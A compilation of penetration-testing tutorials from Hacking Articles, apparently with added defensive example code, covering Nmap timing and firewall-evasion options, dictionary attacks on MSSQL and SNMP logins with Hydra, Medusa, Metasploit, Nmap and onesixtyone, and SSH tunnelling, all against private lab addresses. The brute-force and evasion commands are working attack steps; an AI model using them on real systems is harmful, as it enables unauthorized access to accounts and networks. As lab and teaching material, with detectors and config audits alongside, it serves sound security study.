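            if not sources:                     # empty source list means 'none'
                return False, "frame-ancestors with no sources"
            allowed = any(_source_matches(s, page_origin, framer_origin) for s in sources)
            return allowed, f"frame-ancestors {value.strip()}"
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False, "X-Frame-Options: DENY"
    if xfo == "SAMEORIGIN":
        return _origin(page_origin) == _origin(framer_origin), "X-Frame-Options: SAMEORIGIN"
    if xfo.startswith("ALLOW-FROM"):
        return True, "X-Frame-Options: ALLOW-FROM is obsolete, no protection"
    return True, "no framing restriction"


if __name__ == "__main__":
    # Constructed sample responses for a page at https://shop.example.
    samples = {
        "no headers": {},
        "xfo deny": {"X-Frame-Options": "DENY"},
        "csp": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://*.partner.example"},
    }
    for label, hdrs in samples.items():
        print(label, framable_by(hdrs, "https://shop.example", "https://evil.example"))
```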

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Advance Web Application Testing using Burpsuite appeared first on Hacking Articles.

Nmap Scan with Timing Parameters


Hello everyone, in this article we will look at the different parameters that together make up a timing template, and at how to use those parameters individually as you wish.

Let’s Start!!

Nmap timing template

As we have seen, Nmap has multiple timing templates that can be used according to the requirement. Click here to check the timing scan article. Let's see what is inside a timing template. To get the description of a timing template we use the -d attribute.

nmap -T4 -d -p21-25 192.168.1.139

Here we have multiple arguments that collectively make a timing template. Let’s have a look at them one by one.

  • Host-groups
  • Rtt-timeouts
  • Scan-delay
  • Max-retries
  • Min-rates
  • Parallelism

Maximum Retries (–max-retries)

--max-retries specifies the number of times a probe is re-sent to a port to check whether it is open or closed. If --max-retries is set to 0, the probe is sent only once per port and no retries are made.

nmap -p21-25 192.168.1.139 --max-retries 0

Here in Wireshark we can see that exactly one TCP SYN packet is sent to each port from source 192.168.1.126 to destination 192.168.1.139, and none is sent again.

Now we apply a small firewall rule on the target machine so that packets get blocked if they arrive too fast.

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --set

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --update --seconds 1 --hitcount 1 -j DROP

Now the normal scan will not show any results with max-retries set to 0.

nmap -p21-25 192.168.1.139 --max-retries 0

As we can see, the ports whose packets got dropped are not probed again, so their status is not determined.

Here we can increase the max-retries value, which gets past the specified firewall filter so that we can get the exact port status.

nmap -p21-25 192.168.1.139 --max-retries 5

Here we can see that TCP SYN packets to a port from source 192.168.1.126 to destination 192.168.1.139 are sent again and again until the port returns a reply or the maximum retry value (here 5) is reached.
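Both this max-retries section and the firewall-rule sections of the timing-template article above turn on the same mechanism: the recent-module rule answers a probe only if it arrives more than the rule's window after the previous probe from that source, so how many ports get resolved depends on the gap between probes and on how many retries remain. The following added Python model (example code written for this page, not Nmap's or netfilter's own logic) reproduces that interplay; the probe gap and retry wait values are assumptions chosen to illustrate, and real Nmap adapts its timeouts and scan delay dynamically rather than using fixed values.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class RecentRateLimit:
    """Model of the two iptables rules used above, for one source address:

        -I INPUT -p tcp -m state --state NEW -m recent --set
        -I INPUT -p tcp -m state --state NEW -m recent --update --seconds W --hitcount 1 -j DROP

    A NEW packet is dropped when the source was seen within the last W
    seconds.  A dropped packet refreshes the timestamp through --update and
    an accepted one through --set, so every probe restarts the window.
    """
    window: float
    last_seen: Optional[float] = None

    def accepts(self, now: float) -> bool:
        hit = self.last_seen is not None and now - self.last_seen <= self.window
        self.last_seen = now
        return not hit


def simulate_scan(ports: List[int], probe_gap: float, retry_wait: float,
                  max_retries: int, window: float) -> Tuple[Dict[int, str], List[tuple]]:
    """Simplified SYN scan of `ports` against a host behind RecentRateLimit(window).

    Round 0 probes every port, probe_gap seconds apart; unanswered ports are
    probed again after retry_wait seconds, for at most max_retries extra
    rounds (the --max-retries budget).  Every probe the firewall accepts is
    answered with SYN/ACK, so that port shows as open; a port that never gets
    an answer is reported as filtered.  Returns the port states and a log of
    (time, port, outcome) tuples.
    """
    fw = RecentRateLimit(window)
    status = {p: "filtered" for p in ports}
    log: List[tuple] = []
    now = 0.0
    for _ in range(max_retries + 1):
        pending = [p for p in ports if status[p] == "filtered"]
        if not pending:
            break
        for port in pending:
            answered = fw.accepts(now)
            log.append((round(now, 3), port, "SYN/ACK" if answered else "dropped"))
            if answered:
                status[port] = "open"
            now += probe_gap
        now += retry_wait
    return status, log


def open_ports(status: Dict[int, str]) -> List[int]:
    """Ports the scan resolved as open, sorted."""
    return sorted(p for p, s in status.items() if s == "open")


if __name__ == "__main__":
    ports = [21, 22, 23, 24, 25]
    # 5 ms probe gap against a 1-second window: only retries landing more than a
    # second after the previous probe get through (3 of 5 with 2 retries, all 5 with 4).
    print(open_ports(simulate_scan(ports, 0.005, 1.1, 2, 1.0)[0]))
    print(open_ports(simulate_scan(ports, 0.005, 1.1, 4, 1.0)[0]))
    # A 15-second gap between probes clears a 3-second window in the first round...
    print(open_ports(simulate_scan(ports, 15.0, 1.0, 0, 3.0)[0]))
    # ...but not a 200-second window, where every probe after the first is dropped.
    for entry in simulate_scan(ports, 15.0, 1.0, 0, 200.0)[1]:
        print(entry)
```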

Host-timeout

--host-timeout tells the scan to give up on a host after the specified time. The shorter the time, the greater the chance of inaccurate scan results.

We can specify the time in milliseconds (ms), seconds (s) or minutes (m).

nmap -p21-25 192.168.1.139 --host-timeout 10ms

Now we try to get the result by increasing the timeout value.

nmap -p21-25 192.168.1.139 --host-timeout 100ms

We can use --host-timeout in other scenarios too, such as when we need to check whether a host is up. Here we show how the host timeout can affect the results of a ping scan.

nmap -sP 192.168.1.139 --host-timeout 10ms

The output of the above command reported 0 hosts up.

nmap -sP 192.168.1.139 --host-timeout 100ms

The output of the above command reported 1 host up.

Hostgroup

The hostgroup attributes specify how many hosts in a network are scanned at a time. You can specify the minimum number of hosts, the maximum number, or both.

nmap -sP 192.168.1.1/24 --min-hostgroup 3 --max-hostgroup 3

From the image below you can observe that it has shown only 3 live hosts from inside the complete subnet, saving you the time of scanning the complete network.

Scan delay

--scan-delay delays each probe by the specified time. It is very useful for evading time-based firewall rules.

nmap -p21-25 192.168.1.139 --scan-delay 11s

Here we can see the time difference between the packets:

packet 1: TCP SYN packet on port 25 at 07:58:01 from 192.168.1.126 to 192.168.1.139

packet 2: TCP SYN packet on port 22 at 07:58:12 from 192.168.1.126 to 192.168.1.139

Now if you compute the time difference between these packets you get an 11-second lapse between them.

Maximum rate (max-rate)

Rate specifies how fast packets are sent, in other words how many packets are sent per second. --max-rate sets the maximum number of packets sent per second.

nmap -p21-25 192.168.1.139 --max-rate 2

Wireshark shows that the packet sending rate does not exceed 2, i.e. at most 2 packets are sent per second:

packet 1: TCP SYN packet on port 21 at 03:17:20 from 192.168.1.126 to 192.168.1.139

packet 2: TCP SYN packet on port 23 at 03:17:21 from 192.168.1.126 to 192.168.1.139

Now if you compute the time difference between these packets you get a 1-second lapse, indicating that these two packets were not sent together.

Minimum rate (min-rate)

--min-rate sets the minimum number of packets sent per second. If we want at least 2 packets per second to be sent to the target network, and not fewer, we execute the command below.

nmap -p21-25 192.168.1.139 --min-rate 2

Wireshark shows that the packet sending rate is at least 2, i.e. 2 or more packets are sent per second:

packet 1: TCP SYN packet on port 23 at 03:28:29 from 192.168.1.126 to 192.168.1.139

packet 2: TCP SYN packet on port 22 at 03:28:29 from 192.168.1.126 to 192.168.1.139

Now if you will count the time difference between these packets you get only a fraction of second as time laps between these two packets indicating that these two packets were sent together.

Parallelism

The parallelism attribute is used to send multiple packets in parallel. min-parallelism means that the number of packets sent in parallel must be at least the value specified, and max-parallelism means that the number of packets sent in parallel must be less than or equal to the value specified.

nmap -p21-25 192.168.1.139 --min-parallelism 2 --max-parallelism 2

In Wireshark we can see a couple of TCP SYN packets sent in parallel from 192.168.1.126, which is neither less nor greater than 2.

Round trip timeout

RTT timeout is the time allowed for a packet to return a reply. min-rtt-timeout specifies the minimum value of time that is to be taken by a packet to return a reply.

nmap -p21-25 192.168.1.139 --min-rtt-timeout 5ms

Wireshark shows that the packet and its reply take time greater than the min-rtt-timeout specified.

packet 1: TCP SYN packet on port 25 at 08:10:53.232666116 from 192.168.1.126 to 192.168.1.139

packet 2: SYN ACK packet from port 25 at 08:10:53.233466679 from 192.168.1.139 to 192.168.1.126

Max-rtt-timeout

max-rtt-timeout specifies the maximum value of time that is to be taken by a packet to return a reply.

nmap -p21-25 192.168.1.139 --max-rtt-timeout 50ms

Wireshark shows that the packet and its reply take less time than the max-rtt-timeout.

packet 1: TCP SYN packet on port 22 at 08:15:08.171777907 from 192.168.1.126 to 192.168.1.139

packet 2: SYN ACK packet from port 22 at 08:15:08.173117154 from 192.168.1.139 to 192.168.1.126

Initial Round trip timeout

initial-rtt-timeout specifies the initial value of time to be taken by a packet to return a reply. The return time can be greater or less than the initial-rtt-timeout, because max-rtt-timeout and min-rtt-timeout specify the range of time for a packet to return a reply, but Nmap first attempts to get the reply within the time specified in initial-rtt-timeout.

nmap -p21-25 192.168.1.139 --initial-rtt-timeout 15ms

Wireshark shows that the time taken by the packet to return a reply is around the same as specified in initial-rtt-timeout.

packet 1: TCP SYN packet on port 23 at 08:18:45.342395520 from 192.168.1.126 to 192.168.1.139

packet 2: SYN ACK packet from port 23 at 08:18:45.342930962 from 192.168.1.139 to 192.168.1.126
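To put numbers on what the captures above show, here is an added example (not part of the original article) that computes inter-packet gaps, send rate and RTT from constructed records in the same shape as the Wireshark lines quoted, and shows why a rule keyed only on a short time window misses the --scan-delay 11s scan while a distinct-port count over a longer window still flags it. The timestamps match the text; the detection thresholds are assumptions.

```python
"""Inter-packet timing for the Nmap probes above, and why short time windows miss slow scans.

Added example, not from the original article. The capture records are constructed to match
the Wireshark timestamps quoted in the text; the detection thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime


def parse_ts(stamp):
    """Parse 'HH:MM:SS.fffffffff' (Wireshark prints nanoseconds; keep microseconds)."""
    hms, _, frac = stamp.partition(".")
    return datetime.strptime(f"{hms}.{(frac + '000000')[:6]}", "%H:%M:%S.%f")


# Constructed probes in the shape the article reads off Wireshark:
# (timestamp, src, dst, dst_port, tcp_flags)
SCAN_DELAY_11S = [  # --scan-delay 11s: one SYN every 11 seconds
    ("07:58:01.000000", "192.168.1.126", "192.168.1.139", 25, "S"),
    ("07:58:12.000000", "192.168.1.126", "192.168.1.139", 22, "S"),
    ("07:58:23.000000", "192.168.1.126", "192.168.1.139", 21, "S"),
    ("07:58:34.000000", "192.168.1.126", "192.168.1.139", 23, "S"),
    ("07:58:45.000000", "192.168.1.126", "192.168.1.139", 24, "S"),
]
MIN_RATE_2 = [  # --min-rate 2: several SYNs inside the same second
    ("03:28:29.000000", "192.168.1.126", "192.168.1.139", 23, "S"),
    ("03:28:29.000400", "192.168.1.126", "192.168.1.139", 22, "S"),
    ("03:28:29.500000", "192.168.1.126", "192.168.1.139", 21, "S"),
    ("03:28:30.000000", "192.168.1.126", "192.168.1.139", 25, "S"),
    ("03:28:31.000000", "192.168.1.126", "192.168.1.139", 24, "S"),
]


def interpacket_gaps(packets):
    """Seconds between consecutive probes, the number the article derives by hand."""
    times = [parse_ts(p[0]) for p in packets]
    return [round((b - a).total_seconds(), 6) for a, b in zip(times, times[1:])]


def packets_per_second(packets):
    """Average send rate over the capture, comparable with --min-rate / --max-rate."""
    times = [parse_ts(p[0]) for p in packets]
    span = (times[-1] - times[0]).total_seconds()
    return len(packets) / span if span > 0 else float("inf")


def round_trip(syn_stamp, synack_stamp):
    """Observed RTT between a SYN and its SYN/ACK, comparable with the rtt-timeout options."""
    return (parse_ts(synack_stamp) - parse_ts(syn_stamp)).total_seconds()


def detect_port_scans(packets, window_s, min_ports):
    """Return sources that send SYNs to at least `min_ports` distinct ports of one
    destination within any `window_s`-second window. A short window (what a purely
    time-based rule effectively uses) misses the 11 s scan delay; a longer window
    with the same port threshold still catches it."""
    probes = defaultdict(list)
    for stamp, src, dst, port, flags in packets:
        if "S" in flags and "A" not in flags:  # client-side SYNs only
            probes[(src, dst)].append((parse_ts(stamp), port))
    flagged = set()
    for (src, _dst), seen in probes.items():
        seen.sort()
        for i, (start, _port) in enumerate(seen):
            ports = set()
            for stamp, port in seen[i:]:
                if (stamp - start).total_seconds() > window_s:
                    break
                ports.add(port)
            if len(ports) >= min_ports:
                flagged.add(src)
                break
    return flagged


if __name__ == "__main__":
    print("scan-delay gaps:", interpacket_gaps(SCAN_DELAY_11S))      # [11.0, 11.0, 11.0, 11.0]
    print("min-rate pps:", packets_per_second(MIN_RATE_2))           # 2.5
    print("rtt:", round_trip("08:10:53.232666116", "08:10:53.233466679"))
    print("5 s window:", detect_port_scans(SCAN_DELAY_11S, 5, 3))    # set()
    print("60 s window:", detect_port_scans(SCAN_DELAY_11S, 60, 3))  # {'192.168.1.126'}
```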

Author: Deepanshu is a Certified Ethical Hacker and a budding security researcher. Contact here.

The post Nmap Scan with Timing Parameters appeared first on Hacking Articles.


4 ways to Hack MS SQL Login Password


In this article, we will learn how to gain control over our victim's PC through port 1433, used for the MSSQL service. There are various ways to do it, so let's take time and learn all of them, because different circumstances call for different measures.

Let’s start!!

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more.

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt -s 1433 -t 16 192.168.1.128 mssql

-P:  denotes path for password list

-L: denotes path of username text file (sa is default user of Mssql)

Once the command is executed it will start applying the dictionary attack, and so you will have the right password in no time. As you can observe, we have successfully grabbed the MSSQL password as apple@123456.

Medusa

Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, MSSQL, HTTP, IMAP, rlogin, SSH, and Subversion, to name a few.

Run the following command

medusa -h 192.168.1.128 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql

Here

-U: denotes path of username text file (sa is default user of MSSQL)

-P: denotes path for password list

As you can observe, we have successfully grabbed the MSSQL password as apple@123456.

xHydra

This is the graphical version for applying a dictionary attack via port 1433 to hack a system. For this method to work:

Enter xHydra in your Kali Linux terminal. Select the Single Target option and give the IP of your victim PC there. Then select MSSQL in the box against the Protocol option and give the port number 1433 against the Port option.

Now, go to the Passwords tab, select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to the Start tab and click on the Start button on the left.

Now the dictionary attack will start. Thus you will obtain the username sa and the password of your victim.

Metasploit

This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).

use auxiliary/scanner/mssql/mssql_login

msf auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.1.128

msf auxiliary(scanner/mssql/mssql_login) > set user_file /root/Desktop/user.txt

msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true

msf auxiliary(scanner/mssql/mssql_login) > run

Awesome!! From the image below you can observe that the same password, apple@123456, has been found by Metasploit.

Nmap

The command below will attempt to determine the username and password through a brute-force attack against MS-SQL by means of username and password dictionaries.

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.128

In the image shown you can observe that we successfully retrieved the credentials: username sa and password apple@123456.
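The defender's side of the same attack, as an added example that is not part of the original article: a parser for the SQL Server error log and a detector that flags a burst of failed sa logins from one client and a successful login that follows it. The log lines are constructed in the shape SQL Server writes for error 18456; the window and threshold are assumptions.

```python
"""Spot an MSSQL (port 1433) dictionary attack in the SQL Server error log.

Added example, not from the original article. The log lines are constructed in the shape
SQL Server writes for error 18456; successful logins appear only when login auditing
includes them. Window and threshold are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)

# Constructed: six failures for 'sa' from one client inside a second, then a success from the
# same client (the trace a wordlist that contains the real password leaves), plus one stray
# failure from another host that should not be flagged.
SAMPLE_LOG = """\
2018-05-10 03:17:20.12 Logon       Error: 18456, Severity: 14, State: 8.
2018-05-10 03:17:20.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2018-05-10 03:17:20.15 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2018-05-10 03:17:20.19 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2018-05-10 03:17:20.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2018-05-10 03:17:20.27 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2018-05-10 03:17:20.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2018-05-10 03:17:21.02 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.1.126]
2018-05-10 03:20:00.00 Logon       Login failed for user 'raj'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
"""


def parse_logins(text):
    """(timestamp, client, user, succeeded) for every login line; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["client"], m["user"], m["result"] == "succeeded"))
    return events


def find_bruteforce(events, window=timedelta(seconds=60), threshold=5):
    """Per client: a burst of >= threshold failures inside `window`, the accounts it targeted,
    and any account that logged in successfully after the burst (treat that as compromised)."""
    by_client = defaultdict(list)
    for ts, client, user, ok in events:
        by_client[client].append((ts, user, ok))
    findings = {}
    for client, evs in by_client.items():
        evs.sort()
        fails = [(ts, user) for ts, user, ok in evs if not ok]
        burst_end = None
        for i in range(len(fails) - threshold + 1):
            if fails[i + threshold - 1][0] - fails[i][0] <= window:
                burst_end = fails[i + threshold - 1][0]
                break
        if burst_end is None:
            continue
        findings[client] = {
            "failures": len(fails),
            "users_tried": sorted({user for _, user in fails}),
            "success_after_burst": sorted({user for ts, user, ok in evs if ok and ts >= burst_end}),
        }
    return findings


if __name__ == "__main__":
    for client, info in find_bruteforce(parse_logins(SAMPLE_LOG)).items():
        print(client, info)
```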

Author: Rahul Virmani is a Certified Ethical Hacker and a researcher in the field of network Penetration Testing (CYBER SECURITY). Contact Here

The post 4 ways to Hack MS SQL Login Password appeared first on Hacking Articles.

Comprehensive Guide to SSH Tunnelling


Basically, tunnelling is a process which allows data sharing or communication between two different networks privately. Tunnelling is normally performed by encapsulating the private network data and protocol information inside the public network transport units, so that the private network protocol information is visible to the public network only as data.

SSH Tunnel: Tunnelling is the concept of encapsulating one network protocol inside another; here we put it inside SSH, so all network communication is encrypted. Because tunnelling involves repackaging the traffic data into a different form, perhaps with encryption as standard, a third use is to hide the nature of the traffic that is run through the tunnels.

Types of SSH Tunneling:

  1. Dynamic SSH tunneling
  2. Local SSH tunneling
  3. Remote SSH tunneling

Let’s Begin!!

Objective: To establish an SSH connection between a remote PC and a local system on a different network.

Here I have set up my own lab, which consists of three systems in the following network:

SSH server (two Ethernet interfaces)

IP 192.168.1.104 connected with the remote system

IP 192.168.10.1 connected to the local network system 192.168.10.2

SSH client (local network) holds IP 192.168.10.2

Remote system (outside network)

In the following image we are trying to explain the SSH tunnelling process, where a remote PC is trying to connect to 192.168.10.2, which is on the INTRANET of another network. To establish a connection with the SSH client (raj), the remote PC will create an SSH tunnel which connects to the local system via the SSH server (Ignite).

NOTE: Service SSH must be activated

 

The image given below describes the network configuration for the SSH server, where it shows two IPs: 192.168.1.104 and 192.168.10.1.

Another image given below describes the network configuration for the SSH client, which shows IP 192.168.10.2.

Dynamic SSH Tunneling through Windows

The remote PC is trying to connect to the SSH server (192.168.1.104) via port 22 and logs in successfully to the server. Here we have used PuTTY for establishing the connection between the SSH server (Ubuntu) and the remote user (Windows).

Similarly, the remote PC now tries to connect with the client PC (192.168.10.2) via port 22; since they belong to different networks, it receives a network error.

Steps for dynamic SSH tunnelling

  • Choose the option SSH > Tunnels given in the left column of the Category pane.
  • Give the new forwarded port as 7000 and the connection type as Dynamic, and click on Add at last.

Now connect to the SSH server 192.168.1.104 via port 22 and click on Open when everything is set.

First it will connect to the SSH server; as you can see, we are connected with the SSH server (Ignite).

Now open PuTTY again and give the IP of the client system as Host Name, 192.168.10.2, and Port 22 for SSH, then click on Open.

Open the previously running PuTTY window, choose the Proxy option from Category and follow the steps below:

  • Select proxy type as SOCKS 5
  • Give proxy hostname as 127.0.0.1 and port 7000
  • Click on Open to establish the connection.

Awesome!! We have successfully accessed the SSH client (raj) via port 7000.

Dynamic SSH Tunneling through Kali Linux on Port 80

Now we are using Kali Linux for SSH tunnelling and demonstrating how an attacker or Linux user can take advantage of tunnelling and establish an SSH connection with client systems.

ssh -D 7000 ignite@192.168.1.104

Enter the user's password to log in and get access to the SSH server as shown below.

Next we need to set a network proxy to enable SOCKS v5; for that, follow the steps below.

  • In your web browser "Firefox", go to the General settings tab and open Network Proxy.
  • Choose No Proxy
  • Enable SOCKS v5

Add localhost, 127.0.0.1 as Manual proxy

So from the image below you can see that now we are able to connect with the client 192.168.10.2 via port 80.

Dynamic SSH Tunneling through Kali Linux on Port 22

Now connect to the client machine through the command given below:

ssh -D 7000 ignite@192.168.1.104

Install tsocks from the apt repository using the command: apt install tsocks.

tsocks: a library for intercepting outgoing network connections and redirecting them through a SOCKS server.

Open the tsocks.conf file to edit the SOCKS server IP and port; in our case we need to mention the two lines below and then save it.

server = 127.0.0.1

server_port = 7000

Now connect to the SSH client with the help of tsocks using the command given below.

tsocks ssh raj@192.168.10.2

Enter the password and enjoy access to the SSH client.

Local SSH Tunneling through Windows

Local tunnelling is a process to access a specific SSH client machine for communication. It lets you establish a connection to a specific machine which is not reachable from the internet.

The only difference between dynamic tunnelling and local tunnelling is that dynamic tunnelling requires a SOCKS proxy for tunnelling all TCP traffic, while local tunnelling only requires the destination IP address.

Steps for SSH local tunnelling

  • Use PuTTY to connect to the SSH server (192.168.1.104) via port 22 and choose the option SSH > Tunnels given in the left column of Category.

  • Give the new forwarded port as 7000 and the connection type as Local
  • Give the destination address as 192.168.10.2:22 for establishing the connection with the specific client and click on Add at last.
  • Click on Open when everything is set.

First this will establish the connection between the remote PC and the SSH server.

Open a new PuTTY window and follow the steps below:

  • Give the hostname as localhost, port 7000 and connection type SSH.
  • Click on Open to establish the connection.

Awesome!! We have successfully accessed the SSH client via port 7000.

Local SSH Tunneling through Kali Linux

Now again we switch to Kali Linux for local tunnelling, which is quite easy compared to dynamic. Execute the command below to forward the port to the local machine.

ssh -L 7000:192.168.10.2:22 ignite@192.168.1.104

Now open a new terminal and type the command below to connect to the SSH client.

ssh raj@127.0.0.1 -p 7000

Awesome!! We have successfully accessed the SSH client via port 7000.

Remote SSH Tunneling through Putty

Remote tunnelling is useful when a client machine wants to access a remote system which is outside its network.

First we need to install PuTTY on our SSH server (ignite) and then follow the given steps.

Steps for remote tunnelling

  • Enter the remote system IP 192.168.1.108
  • Mention port 22
  • Go to SSH > Tunnels options

  • Give the new forwarded port as 7000 and the connection type as Remote
  • Give the destination address as 192.168.10.2:22 for establishing the connection with the specific client and click on Add at last.
  • Click on Open when everything is set.

Now the server will get connected to the remote system as shown in the image below.

Come back to the remote system and enter the following command to connect with the SSH client machine.

ssh raj@127.0.0.1 -p 7000

From the image below you can observe that we have successfully connected with the SSH client machine via port 7000.

Remote SSH Tunneling through Ubuntu

If you are not willing to use PuTTY for remote tunnelling then you can execute the following command:

ssh -R 7000:192.168.10.2:22 root@192.168.1.108

Here 192.168.10.2 is our local client (raj) IP and 192.168.1.108 is our remote system IP.

Come back to the remote system and enter the following command to connect with the SSH client machine.

ssh raj@127.0.0.1 -p 7000

From the image below you can observe that we have successfully connected with the SSH client machine via port 7000.
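Whether any of the three tunnel types above can be built through a given server is decided by a handful of sshd_config directives. This added example (not part of the original article) parses a config and reports the resulting posture for -D/-L and for -R. Defaults follow sshd_config(5); the sample configs are constructed and Match blocks are not evaluated.

```python
"""Audit an sshd_config for the directives that decide whether the -D, -L and -R tunnels
above can be built through a server, and how far they reach.

Added example, not from the original article. Defaults follow sshd_config(5); the sample
configs are constructed. Match blocks are not evaluated (assumption: global scope only)."""

DEFAULTS = {"allowtcpforwarding": "yes", "permitopen": "any", "gatewayports": "no"}


def parse_sshd_config(text):
    """First occurrence of a keyword wins, as sshd resolves it; '#' comments are dropped."""
    settings, seen = dict(DEFAULTS), set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.replace("=", " ", 1).partition(" ")
        key = key.lower()
        if key == "match":  # directives after a Match line are conditional; stop here
            break
        if key in DEFAULTS and key not in seen:
            settings[key] = value.strip()
            seen.add(key)
    return settings


def forwarding_posture(settings):
    """Map the directives onto the three tunnel types from the article."""
    mode = settings["allowtcpforwarding"].lower()
    permit = settings["permitopen"].lower()
    gateway = settings["gatewayports"].lower()
    local = mode in ("yes", "all", "local") and permit != "none"
    remote = mode in ("yes", "all", "remote")
    return {
        "local_or_dynamic": local,                       # ssh -L / ssh -D via this server
        "local_destinations": "any" if permit == "any" else settings["permitopen"],
        "remote": remote,                                # ssh -R listener on the server
        "remote_reachable_off_host": remote and gateway in ("yes", "clientspecified"),
    }


# Constructed sample configs: stock defaults, fully closed, and a scoped middle ground.
STOCK = "Port 22\nPermitRootLogin prohibit-password\n"
CLOSED = "AllowTcpForwarding no\nGatewayPorts no\n"
SCOPED = """\
AllowTcpForwarding local      # no -R tunnels back into the 192.168.10.0/24 network
PermitOpen 192.168.10.2:22    # -L and -D may only reach the one SSH client host
GatewayPorts no
Match User ignite
    AllowTcpForwarding yes
"""

if __name__ == "__main__":
    for name, cfg in (("stock", STOCK), ("closed", CLOSED), ("scoped", SCOPED)):
        print(name, forwarding_posture(parse_sshd_config(cfg)))
```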

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post Comprehensive Guide to SSH Tunnelling appeared first on Hacking Articles.

6 Ways to Hack SNMP Password


In this article, we will learn how to gain control over our victim's SNMP service. There are various ways to do it, so let's take time and learn all of them, because different circumstances call for different measures.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more.

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -P /root/Desktop/pass.txt 192.168.1.125 snmp

-P:  denotes path for password list

Once the command is executed it will start applying the dictionary attack, and so you will have the right password in no time. As you can observe, we have successfully grabbed the SNMP password as ignite123.

xHydra

This is the graphical version for applying a dictionary attack via the SNMP port to hack a system. For this method to work:

Open xHydra in your Kali. Select the Single Target option and give the IP of your victim PC there. Then select SNMP in the box against the Protocol option and give the port number 161 against the Port option.

Now, go to the Passwords tab and in the Username section check the box adjacent to "Protocol doesn't require username".

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

Now go to the Specific tab and, under SNMP, clear the data written in the text box below SNMP as shown in the given screenshot.

When you have cleared all entries it will look as shown in the next image below.

After doing this, go to the Start tab and click on the Start button on the left.

Now the dictionary attack will start. Thus you will obtain the password of your victim.

As you can see, we have cracked the password ignite123.

Medusa

Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, SNMP, and VNC, to name a few.

Run the following command

medusa -M snmp -h 192.168.1.125 -u ignite -P /root/Desktop/pass.txt

Here

-h: denotes host IP

-u: denotes a particular user

Brute forcing SNMP doesn't require a username, but Medusa doesn't work without a proper syntax, so you can use any username of your choice.

-P: denotes path for password list

As you can observe, we have successfully grabbed the SNMP password as ignite123.

Metasploit

This module will test SNMP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/snmp/snmp_login

msf auxiliary(scanner/snmp/snmp_login)> set rhosts 192.168.1.125 (IP of Remote Host)

msf auxiliary(scanner/snmp/snmp_login)> set pass_file  /root/Desktop/pass.txt

msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true

msf auxiliary(scanner/snmp/snmp_login)> run

From the image below you can observe that we have successfully grabbed the SNMP password.

Nmap

We can also crack the SNMP password using Nmap; execute the command below.

nmap -sU -p 161 -n --script snmp-brute 192.168.1.125 --script-args snmp-brute.communitiesdb=/root/Desktop/pass.txt

As you can see above, we have cracked the password ignite123.

Onesixtyone

Onesixtyone is an SNMP scanner that sends multiple SNMP requests to multiple IP addresses, trying different community strings and waiting for replies.

onesixtyone 192.168.1.125 -c /root/Desktop/pass.txt

As you can see above, we have cracked the password ignite123 using onesixtyone.

 

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post 6 Ways to Hack SNMP Password appeared first on Hacking Articles.

SNMP Lab Setup and Penetration Testing


What is SNMP?

Simple Network Management Protocol (SNMP) is a protocol for network management. It is used for collecting information from, and configuring, network devices such as servers, printers, hubs, switches, and routers on an Internet Protocol (IP) network. It usually runs on UDP port 161.

Download Vyos Link: https://downloads.vyos.io/?dir=release/1.1.8

Create a new virtual machine using VMware and change the Network Adapter to Bridged as shown in the given screenshot.

